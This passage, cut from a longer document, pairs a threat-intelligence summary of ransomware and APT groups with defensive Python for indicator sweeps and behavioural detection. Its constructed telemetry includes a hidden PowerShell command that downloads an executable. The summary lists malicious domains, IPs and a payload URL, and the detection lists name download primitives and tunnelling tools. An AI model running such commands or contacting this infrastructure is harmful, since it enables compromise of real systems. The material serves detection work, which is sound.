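    for url in URL_RE.findall(low):
        url = url.rstrip(".,;)\"'")
        if url in iocs["url"]:
            hits.append(("url", url))
    for ip in IPV4_RE.findall(low):
        if ip in iocs["ip"]:
            hits.append(("ip", ip))
    for host in HOST_RE.findall(low):
        # exact listed domain, or any subdomain of one
        if host in iocs["domain"] or any(host.endswith("." + d) for d in iocs["domain"]):
            hits.append(("domain", host))
    return hits


def sweep(lines, iocs: dict) -> dict:
    """Map each matching log line to its hits; lines with no hits are left out."""
    report = {}
    for line in lines:
        hits = scan_line(line, iocs)
        if hits:
            report[line] = hits
    return report


# Constructed log lines (DNS, web proxy, netflow, EDR file event); the client
# addresses, host names and paths are invented for this example.
SAMPLE_LOGS = [
    "2025-06-10T09:12:01Z dns 10.0.4.17 twist2katz.com",
    "2025-06-10T09:12:05Z dns 10.0.4.17 www.example.com",
    "2025-06-10T09:13:44Z proxy 10.0.4.17 GET https://archive.org/download/new_image_20250413/new_image.jpg",
    "2025-06-10T09:14:02Z proxy 10.0.4.22 GET https://archive.org/details/some-legit-item",
    "2025-06-10T09:20:10Z flow 10.0.9.3 -> 176.65.134.62:80",
    "2025-06-10T09:21:00Z file ws-017 C:\\Users\\a\\AppData\\Local\\Temp\\x.exe "
    "sha256=DECE5EAEB26D0CA7CEA015448A809AB687E96C6182E56746DA9AE4A2B16EDAA9",
]

if __name__ == "__main__":
    for line, hits in sweep(SAMPLE_LOGS, parse_iocs(IOC_TEXT)).items():
        print(f"{line}\n    -> {hits}")
```

Because the parser keys on the `kind:` prefix and skips every other line, the report text can be fed in as-is; only the five indicator kinds are collected, and hash values are compared case-insensitively so an EDR that reports uppercase digests still matches.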
Analysis Summary
The provided article is a weekly threat intelligence summary that compiles findings across multiple independent reports concerning various actors and themes. It does not focus on a single threat actor, but rather describes the shifting tactics of several distinct groups.
Below is a structured summary covering all actors mentioned contextually within the provided snippets:
***
# Threat Actor: FunkSec
## Attribution & Identity
Hacktivist group that has transitioned into offering Ransomware-as-a-Service (RaaS).
## Activity Summary
Shifted focus from political activism to financially motivated cybercrime, specifically operating a RaaS model. They have claimed at least 172 victims.
## Tactics, Techniques & Procedures
- Leveraging generative AI for rapid victim acquisition.
- Ransomware operations (implying encryption/extortion).
## Targeting
- **Sectors:** Not explicitly detailed, but implied to be diverse because of the RaaS model.
- **Geography:** Not specified.
- **Victims:** At least 172 victims claimed.
## Tools & Infrastructure
- **Malware families used:** Implied RaaS payload.
- **Infrastructure (C2, domains, IPs):**
- Domains: `funksec53xh7j5t6ysgwnaidj5vkh3aqajanplix533kwxdz3qrwugid[.]onion`, `funksec7vgdojepkipvhfpul3bvsxzyxn66ogp7q4pptvujxtpyjttad[.]onion`, `funksecsekgasgjqlzzkmcnutrrrafavpszijoilbd6z3dkbzvqu43id[.]onion`
- URLs: `http://funksec[.]top`, `http://funk4ph7igelwpgadmus4n4moyhh22cib723hllneen7g2qkklml4sqd[.]onion`, `http://pdcizqzjitsgfcgqeyhuee5u6uki6zy5slzioinlhx6xjnsw25irdgqd[.]onion`, `http://ks5424y3wpr5zlug5c7i6svvxweinhbdcqcfnptkfcutrncfazzgz5id[.]onion`
## Implications
Represents the trend of hacktivist groups prioritizing financial gain over ideology, posing a significant RaaS threat.
## Mitigations
Defend against AI-augmented targeting and monitor for indicators associated with their known infrastructure.
***
# Threat Actor: KillSec
## Attribution & Identity
Cyber group aligning with the "Russian cyber realm."
## Activity Summary
Adopting customizable ransomware solutions and implementing double extortion tactics for increased monetization.
## Tactics, Techniques & Procedures
- Ransomware deployment.
- Double extortion tactics.
## Targeting
- **Sectors, Geography, Victims:** Not specified beyond general alignment with Russian-related cyber activity.
## Tools & Infrastructure
- **Malware families used:** Customizable ransomware solutions.
- **Infrastructure (C2, domains, IPs):** Not detailed in the summary snippet.
## Implications
Shows actors exploiting adaptable ransomware frameworks to maximize illicit profits.
## Mitigations
Implement robust defenses against evolving ransomware strains utilizing double extortion.
***
# Threat Actor: GhostSec
## Attribution & Identity
Initially rooted in hacktivism; maintains political motivations but collaborates with cybercriminals for funding. Associated with the `ghost_algeria_group`.
## Activity Summary
Forged partnerships with cybercriminals, launched its own RaaS offering named GhostLocker, and is noted for returning to political motivations after securing funding via cybercrime.
## Tactics, Techniques & Procedures
- Partnership with traditional cybercriminals.
- Ransomware operations (GhostLocker RaaS).
## Targeting
- **Sectors, Geography, Victims:** Not specified.
## Tools & Infrastructure
- **Malware families used:** GhostLocker.
- **Infrastructure (C2, domains, IPs):** Not detailed in the summary snippet.
## Implications
Illustrates the blending of hacktivist identity with professional cybercrime infrastructure for sustainable operations.
## Mitigations
Monitor for collaborative activity between ideologically motivated and financially driven threat actors.
***
# Threat Actor: Librarian Ghouls (aka "Rare Werewolf" or "Rezet")
## Attribution & Identity
Advanced Persistent Threat (APT) group, also tracked as `librarian_ghouls_group`, "Rare Werewolf," or "Rezet."
## Activity Summary
Actively targeting entities in Russia and the CIS region (operations observed until May 2025). They compromise systems using phishing emails containing password-protected archives to establish remote access, steal credentials, and deploy XMRig crypto miners. They deploy self-extracting installers that download various malicious utilities.
## Tactics, Techniques & Procedures
- Spear-phishing via emails containing password-protected archives.
- Deployment of self-extracting installers.
- Use of legitimate third-party software for cover.
- Establishing remote access (e.g., using Anydesk).
- Credential theft.
- Deployment of XMRig crypto miner.
- Data exfiltration.
- **Mentioned Tools:** Anydesk, DefenderControl, XMRig miner, Sticky_Werewolf, MIPKO, Passview, Ngrok, NirCmd.
- **Mentioned Techniques:** Spear-phishing technique, MITRE ATT&CK IDs not supplied.
## Targeting
- **Sectors:** Industrial and educational institutions.
- **Geography:** Russia and the CIS region.
- **Victims:** Specific organizations not named.
## Tools & Infrastructure
- **Malware families used:** XMRig crypto miner, various malicious utilities deployed via installer.
- **Infrastructure (C2, domains, IPs):**
- IP: `185[.]125[.]51[.]5`
- Domains: `downdown[.]ru`, `users-mail[.]ru`, `deauthorization[.]online`, `dragonfires[.]ru`, `vniir[.]space`, `vniir[.]nl`, `hostingforme[.]nl`, `mail-cheker[.]nl`, `unifikator[.]ru`, `outinfo[.]ru`, `anyhostings[.]ru`, `center-mail[.]ru`, `redaction-voenmeh[.]info`, `acountservices[.]nl`, `accouts-verification[.]ru`, `office-email[.]ru`, `email-office[.]ru`, `email-informer[.]ru`, `office-account[.]ru`, `anyinfos[.]ru`, `verifikations[.]ru`, `claud-mail[.]ru`, `detectis[.]ru`, `supersuit[.]site`, `bmapps[.]org`
- URLs: `http://bmapps[.]org/bmcontrol/win64/Install[.]exe`, `https://bmapps[.]org/bmcontrol/win64/app-1[.]4[.]zip`
## Implications
A resilient APT group focused on long-term compromise, combining espionage (credential theft, data exfiltration) with financially motivated activity (cryptojacking).
## Mitigations
Implement strong email filtering for password-protected archives, network monitoring for unusual outbound connections typical of remote access/C2 tools (like Anydesk, Ngrok), and endpoint detection for unauthorized crypto mining activity.
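The Katz Stealer entry above describes a JavaScript dropper that launches PowerShell to fetch a disguised payload, and the mitigation here calls for watching outbound connections to remote-access and tunnelling tools and for unauthorised mining. The Python below is an added example, not code from Kaspersky, Picus or RST Cloud: it runs those two behavioural checks over constructed process and connection events. The domain suffixes for AnyDesk and ngrok, the stratum login marker used to spot XMRig-style mining traffic, and the approved-host inventory are all assumptions to be tuned against your own telemetry; every host name, PID, command line and destination in the sample data is invented.

```python
"""Behavioural checks over constructed endpoint and network telemetry (added example)."""
from dataclasses import dataclass
from typing import Iterable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    host: str
    pid: int
    ppid: int
    image: str      # executable file name
    cmdline: str


@dataclass(frozen=True)
class NetEvent:
    host: str
    pid: int
    dest: str       # destination host name or IP
    port: int
    payload: str = ""   # first bytes sent, when the sensor captures them


Alert = Tuple[str, str]  # (host, description)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Download primitives commonly seen on a dropper's PowerShell command line.
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "start-bitstransfer", "net.webclient")
# Assumed service suffixes for the remote-access and tunnelling tools named in the
# report; verify against your own proxy/DNS data before relying on them.
REMOTE_ACCESS_SUFFIXES = (".net.anydesk.com", ".ngrok.io", ".ngrok-free.app")
# Constructed inventory of hosts where a remote-access tool is sanctioned.
APPROVED_REMOTE_ACCESS_HOSTS = {"helpdesk-01"}
# Assumed fingerprints of a stratum mining handshake (the JSON-RPC login used by
# XMRig-style miners); compared after whitespace is stripped.
MINING_MARKERS = ('"method":"mining.subscribe"', '"method":"login"')


def script_to_powershell_chains(procs: Iterable[ProcEvent]) -> List[Alert]:
    """Flag powershell.exe spawned by a script host with a download primitive on its
    command line: the JavaScript-dropper-to-PowerShell shape of the Katz Stealer chain."""
    procs = list(procs)
    by_pid = {(p.host, p.pid): p for p in procs}
    alerts = []
    for p in procs:
        if p.image.lower() != "powershell.exe":
            continue
        parent = by_pid.get((p.host, p.ppid))
        cmd = p.cmdline.lower()
        if parent and parent.image.lower() in SCRIPT_HOSTS and any(h in cmd for h in DOWNLOAD_HINTS):
            alerts.append((p.host, f"{parent.image} -> {p.image}: {p.cmdline}"))
    return alerts


def unusual_outbound(nets: Iterable[NetEvent], procs: Iterable[ProcEvent]) -> List[Alert]:
    """Flag remote-access/tunnel destinations from hosts not approved for them, and
    connections that open with a stratum mining handshake (whatever the process name)."""
    image_of = {(p.host, p.pid): p.image for p in procs}
    alerts = []
    for n in nets:
        image = image_of.get((n.host, n.pid), "unknown")
        dest = n.dest.lower()
        if dest.endswith(REMOTE_ACCESS_SUFFIXES) and n.host not in APPROVED_REMOTE_ACCESS_HOSTS:
            alerts.append((n.host, f"remote access/tunnel from unapproved host: {image} -> {dest}:{n.port}"))
        payload = n.payload.replace(" ", "").lower()
        if any(marker in payload for marker in MINING_MARKERS):
            alerts.append((n.host, f"stratum mining handshake: {image} -> {dest}:{n.port}"))
    return alerts


# Constructed telemetry: every host name, PID, command line and destination is invented.
PROCS = [
    ProcEvent("ws-017", 4100, 900, "wscript.exe", 'wscript.exe "C:\\Users\\a\\Downloads\\invoice.js"'),
    ProcEvent("ws-017", 4132, 4100, "powershell.exe",
              "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
              "'http://files.example.invalid/new_image.jpg','C:\\Users\\a\\AppData\\Local\\Temp\\x.exe')"),
    ProcEvent("helpdesk-01", 2200, 800, "AnyDesk.exe", "AnyDesk.exe"),
    ProcEvent("ws-042", 3300, 700, "AnyDesk.exe", "AnyDesk.exe"),
    ProcEvent("ws-042", 3310, 700, "ngrok.exe", "ngrok.exe"),
    ProcEvent("ws-042", 3320, 700, "svchost.exe", "svchost.exe"),   # miner hiding behind a system name
    ProcEvent("ws-042", 3330, 700, "explorer.exe", "explorer.exe"),
]
NETS = [
    NetEvent("helpdesk-01", 2200, "relay-1.net.anydesk.com", 443),
    NetEvent("ws-042", 3300, "relay-7.net.anydesk.com", 443),
    NetEvent("ws-042", 3310, "tunnel.eu.ngrok.io", 443),
    NetEvent("ws-042", 3320, "pool.example.invalid", 3333,
             '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","agent":"XMRig/6.22.0"}}'),
    NetEvent("ws-042", 3330, "www.example.com", 443),
]

if __name__ == "__main__":
    for host, what in script_to_powershell_chains(PROCS) + unusual_outbound(NETS, PROCS):
        print(f"[{host}] {what}")
```

The "unusual" in the mitigation is operationalised as "not in the approved inventory": the AnyDesk connection from `helpdesk-01` is left alone while the same destination from a workstation is flagged, and the mining check keys on the handshake rather than on the process name, so a miner renamed to `svchost.exe` is still caught.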
***
# Threat Actors Mentioned in Context of TTPs (Industrial/ICS Focus)
## Attribution & Identity
Groups mentioned historically or in the context of industrial/supply chain threats include: APT28 (Fancy Bear), MuddyWater, and actors linked to Havex RAT.
## Activity Summary
These actors are noted for employing social engineering techniques to breach supply chains and OT environments. APT28 and MuddyWater have used "ClickFix baiting" to execute malicious commands. The summary also references a security incident involving a rogue Raspberry Pi, highlighting insider or vendor threat risks in ICS networks.
## Tactics, Techniques & Procedures
- Supply chain risk exploitation (via physical devices like Raspberry Pi).
- Watering hole techniques.
- ClickFix baiting (social engineering to execute commands).
- MITM attacks.
- LOLBIN usage.
- RATs (Havex, Xworm).
- Lumma Stealer, AsyncRAT.
## Targeting
- **Sectors:** Industrial Control Systems (ICS) environments.
- **Geography & Victims:** Not specified in detail.
## Tools & Infrastructure
- **Malware families used:** Havex RAT, Xworm RAT, Lumma Stealer, AsyncRAT.
- **Infrastructure (C2, domains, IPs):** IPs listed are general IoCs potentially shared by various tracked threats: `212[.]237[.]217[.]182`, `193[.]36[.]38[.]237`, `188[.]34[.]195[.]44`, `138[.]199[.]156[.]22`, `185[.]250[.]151[.]155`, `64[.]94[.]84[.]217`, `94[.]181[.]229[.]250`, `216[.]245[.]184[.]181`, `168[.]119[.]96[.]41`, `205[.]196[.]186[.]70`.
- **Domains:** `rkuagqnmnypetvf[.]top`, `tlgrm-redirect[.]icu`, `diagnostics[.]medgenome[.]com`.
## Implications
A heightened risk to Operational Technology (OT) environments due to sophisticated supply chain infiltration and social engineering tailored for ICS networks.
## Mitigations
Implement stringent vendor/supply chain security policies, use network segmentation to isolate OT environments, and conduct advanced monitoring for anomalous device behavior uncommon in ICS networks.